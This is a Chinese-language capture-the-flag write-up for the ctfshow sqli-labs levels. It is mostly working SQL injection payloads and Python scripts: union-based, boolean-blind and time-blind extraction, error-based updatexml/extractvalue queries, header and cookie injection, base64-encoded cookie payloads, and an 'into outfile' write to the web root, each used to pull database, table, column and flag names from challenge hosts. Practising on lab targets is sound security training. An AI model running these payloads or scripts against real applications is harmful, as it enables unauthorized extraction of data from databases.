ctfshow的sqli-labs和本地搭建最大的不同,就是show的flag不在当前的security
库中,而是在另一个库ctfshow
中,之前一直不知道怎么跨库查询,去现学了一手。
我们在联合查询时,用的是information_schema
,这个库中有tables
、columns
,也有另外一个叫schemata
的表,里面存储的就是数据库中所有的库名。
在schemata
这个表中,列schema_name
就存储的是所有数据库的库名
payload:
爆出库名
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata-- -
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- -
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'-- -
?id=-1' union select 1,group_concat(flag),3 from ctfshow.flag-- -
第二题和第一题不同的就是第一题是'
闭合的,第二题是数字型
,把闭合的单引号去掉就行
payload:
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata-- -
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- -
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flagaa'-- -
?id=-1 union select 1,group_concat(flagac),3 from ctfshow.flagaa-- -
')
闭合
")
闭合
'
闭合
这题和前面四题最大的不同在于它输入了数据库中存在的数据时,只回显一个you are in.....
,如果输入数据库中不存在的数据,就没有回显。很明显,是布尔盲注
,可以选择自己写脚本来快速得到flag
import requests
if __name__ == '__main__':
url = 'http://d1e86be0-6e2a-42b1-9fc6-f2382b36311a.challenge.ctf.show:8080?id=1%27and%20'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagpuck"),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(flag33) from ctfshow.flagpuck),{i},1))>{mid},1,0)%23'
# print(payload)
r = requests.get(url=url + payload)
if 'You are in...........' in r.text:
low = mid + 1
else:
high = mid
if low != 32:
result += chr(low)
else:
break
print(result)
使用二分法是一个不错的选择。在payload中,substr()
函数的作用是依次截取每一个字符,确定它们的ascii码值,然后用ascii()
函数将其转换成对应的字符;如果发现有you are in....
出现,则说明对应的字符ascii值大于low和high的均值
,则low
值变为mid+1
,如果未出现,说明小于,将mid
赋给high
"
闭合
import requests
if __name__ == '__main__':
url = 'http://28c313d6-1841-4035-adab-c84443e19961.challenge.ctf.show:8080/?id=1%22and%20'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagpa"),{i},1))>{mid},1,0)%23'
payload = f'if(ascii(substr((select group_concat(flag3a3) from ctfshow.flagpa),{i},1))>{mid},1,0)%23'
# print(payload)
r = requests.get(url=url + payload)
if 'You are in...........' in r.text:
low = mid + 1
else:
high = mid
if low != 32:
result += chr(low)
else:
break
print(result)
'))
闭合
这题的hint是要写文件,一开始,我想到写马进去,但是flag是在数据库中的,所以这个方法不可行,后来想到可以把库名、表名啥的写进去,然后访问。
payload:
?id=1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' into outfile "/var/www/html/1.txt"-- -
?id=1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flagdk' into outfile "/var/www/html/2.txt"-- -
?id=1')) union select 1,2,group_concat(flag43) from ctfshow.flagdk into outfile "/var/www/html/3.txt"-- -
import requests
if __name__ == '__main__':
url = 'http://c72dc775-84d8-47c9-ac8b-de8ef204158e.challenge.ctf.show:8080/?id=1%27and%20'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)%23'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagjugg"),{i},1))>{mid},1,0)%23'
payload = f'if(ascii(substr((select group_concat(flag423) from ctfshow.flagjugg),{i},1))>{mid},1,0)%23'
# print(payload)
r = requests.get(url=url + payload)
if 'You are in...........' in r.text:
low = mid + 1
else:
high = mid
if low != 32:
result += chr(low)
else:
break
print(result)
这题无论输入什么,都会显示you are in....
,那么就可以使用时间盲注,通过sleep()函数,如果正确就睡几秒,错误就立即加载页面,也是可以写一个脚本去跑。
'
闭合
import requests
if __name__ == '__main__':
url = 'http://8fe3d6cd-1e9a-4466-a20d-4588602016c7.challenge.ctf.show:8080/?id=1%27and%20'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.1),0)%23'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.1),0)%23'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagug"),{i},1))>{mid},sleep(0.1),0)%23'
payload = f'if(ascii(substr((select group_concat(flag4a23) from ctfshow.flagug),{i},1))>{mid},sleep(0.2),0)%23'
# print(payload)
r = requests.get(url=url + payload)
try:
r = requests.get(url=url + payload, timeout=0.15) # 0.15s内必须返回结果,然后执行下面的语句,如果0.15s还没有结果,则执行except的内容
high = mid
except:
low = mid + 1
if low != 32:
result += chr(low)
else:
break
print(result)
脚本中使用了一个异常处理try....except
,0.15s内必须返回结果,然后执行下面的语句,如果0.15s还没有结果,则执行except的内容。
"
闭合
import requests
if __name__ == '__main__':
url = 'http://f01b14ad-1ed5-4eff-aa62-b5c6fedf01ec.challenge.ctf.show:8080/?id=1%22and%20'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.2),0)%23'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.2),0)%23'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagugs"),{i},1))>{mid},sleep(0.2),0)%23'
payload = f'if(ascii(substr((select group_concat(flag43s) from ctfshow.flagugs),{i},1))>{mid},sleep(0.2),0)%23'
r = requests.get(url=url + payload)
try:
r = requests.get(url=url + payload, timeout=0.15) # 0.15s内必须返回结果,然后执行下面的语句,如果0.15s还没有结果,则执行except的内容
high = mid
except:
low = mid + 1
if low != 32:
result += chr(low)
else:
break
print(result)
这题是在登录框的用户名处进行post注入
payload:
uname=aadmin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow'#&passwd=1
uname=aadmin' union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd'#&passwd=1
uname=aadmin' union select 1,group_concat(flag43s) from ctfshow.flagugsd#&passwd=1
")
闭合
')
闭合
这题没有回显,但是如果注入成功,会有一个flag.jpg
的图片,注入失败,会有slap.jpg
的图片,可以利用这个来进行布尔盲注
import requests
if __name__ == '__main__':
url = 'http://9301abaf-d8ee-4cc9-a060-6aad4a35035b.challenge.ctf.show:8080'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flag"),{i},1))>{mid},1,0)'
payload = f'if(ascii(substr((select group_concat(flag4) from ctfshow.flag),{i},1))>{mid},1,0)'
# print(payload)
data = {
'uname': f"admin') and {payload}#",
'passwd': '123'
}
# print(data['uname'])
r = requests.post(url=url, data=data)
if 'flag.jpg' in r.text:
low = mid + 1
else:
high = mid
if low != 32:
result += chr(low)
else:
break
print(result)
"
闭合
import requests
if __name__ == '__main__':
url = 'http://240d4931-ff0b-405b-a741-91f392e537cd.challenge.ctf.show:8080/'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagb"),{i},1))>{mid},1,0)'
payload = f'if(ascii(substr((select group_concat(flag4s) from ctfshow.flagb),{i},1))>{mid},1,0)'
# print(payload)
data = {
'uname': f'admin" and {payload}#',
'passwd': '123'
}
# print(data['uname'])
r = requests.post(url=url, data=data)
if 'flag.jpg' in r.text:
low = mid + 1
else:
high = mid
if low != 32:
result += chr(low)
else:
break
print(result)
把报错关了,手动试出'
闭合
import requests
if __name__ == '__main__':
url = 'http://a70f0c66-19e8-497f-87d7-fdcf275647fa.challenge.ctf.show:8080/'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagba"),{i},1))>{mid},1,0)'
payload = f'if(ascii(substr((select group_concat(flag4sa) from ctfshow.flagba),{i},1))>{mid},1,0)'
# print(payload)
data = {
'uname': f"admin' and {payload}#",
'passwd': '123'
}
# print(data['uname'])
r = requests.post(url=url, data=data)
if 'flag.jpg' in r.text:
low = mid + 1
else:
high = mid
if low != 32:
result += chr(low)
else:
break
print(result)
这题是时间盲注,因为无论正不正确,下面的图片都是fail,利用sleep()
函数手动试出是")
闭合
import requests
if __name__ == '__main__':
url = 'http://59b43bf0-9578-454a-a79c-dc89b97ca7ae.challenge.ctf.show:8080/'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},sleep(0.2),0)'
# payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},sleep(0.2),0)'
# payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flagbab"),{i},1))>{mid},sleep(0.2),0)'
payload = f'if(ascii(substr((select group_concat(flag4sa) from ctfshow.flagbab),{i},1))>{mid},sleep(1),0)'
# print(payload)
data = {
'uname': f'admin") and {payload}#',
'passwd': '123'
}
# print(data['uname'])
try:
r = requests.post(url=url, data=data, timeout=0.5)
high = mid
except:
low = mid + 1
if low != 32:
result += chr(low)
else:
break
print(result)
好像只剩下报错注入了
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1)-- -
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name='flag'),0x7e),1)-- -
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select (flag4) from ctfshow.flag),0x7e),1)-- -
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e),1)-- -
网页上显示出来一个ip,在提交登录请求后会显示出ua头,那么很可能是ua注入
,修改user-agent
即可
payload:
' and updatexml(1,concat(0x7e,(select(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1) and '1'='1
' and updatexml(1,concat(0x7e,(select(column_name) from information_schema.columns where table_name='flag' limit 1,1),0x7e),1) and '1'='1
' and updatexml(1,concat(0x7e,(select(flag4) from ctfshow.flag),0x7e),1) and '1'='1
' and updatexml(1,concat(0x7e,(select right (flag4,20) from ctfshow.flag),0x7e),1) and '1'='1
提交post请求后会出现referer
头,说明这题是referer注入
'
闭合
payload:
' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),0x7e)) and '1'='1
' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag"),0x7e)) and '1'='1
' and extractvalue(1,concat(0x7e,(select group_concat(flag4) from ctfshow.flag),0x7e)) and '1'='1
' and extractvalue(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e)) and '1'='1
cookie注入
'
闭合
payload:
uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e))-- -
uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e))-- -
uname=admin' and extractvalue(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e))-- -
在上一题的基础上多了个base64
编码
')
闭合
payload:
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nY3Rmc2hvdycpLDB4N2UpKS0tIC0N
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0nZmxhZycpLDB4N2UpKS0tIC0N
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZzQpIGZyb20gY3Rmc2hvdy5mbGFnKSwweDdlKSktLSAtDQ==
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCByaWdodChmbGFnNCwyMCkgZnJvbSBjdGZzaG93LmZsYWcpLDB4N2UpKS0tIC0N
"
闭合
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdjdGZzaG93JyksMHg3ZSkpLS0gLQ==
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdmbGFnJyksMHg3ZSkpLS0gLQ==
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHJpZ2h0KGZsYWc0LDIwKSBmcm9tIGN0ZnNob3cuZmxhZyksMHg3ZSkpLS0gLQ==
这题首先用?id=1'
,发现有语法问题,而?id=1''
,则有回显,一开始我以为是"
闭合,后来发现不对,想到有两个'
需要闭合,用?id=1' and 1='1
测试有回显,而?id=1' and 1='0
无回显,说明分析正确
?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),'3
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'3
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),'3
?id=-1' union select 1,(select group_concat(flag4) from ctfshow.flag),'3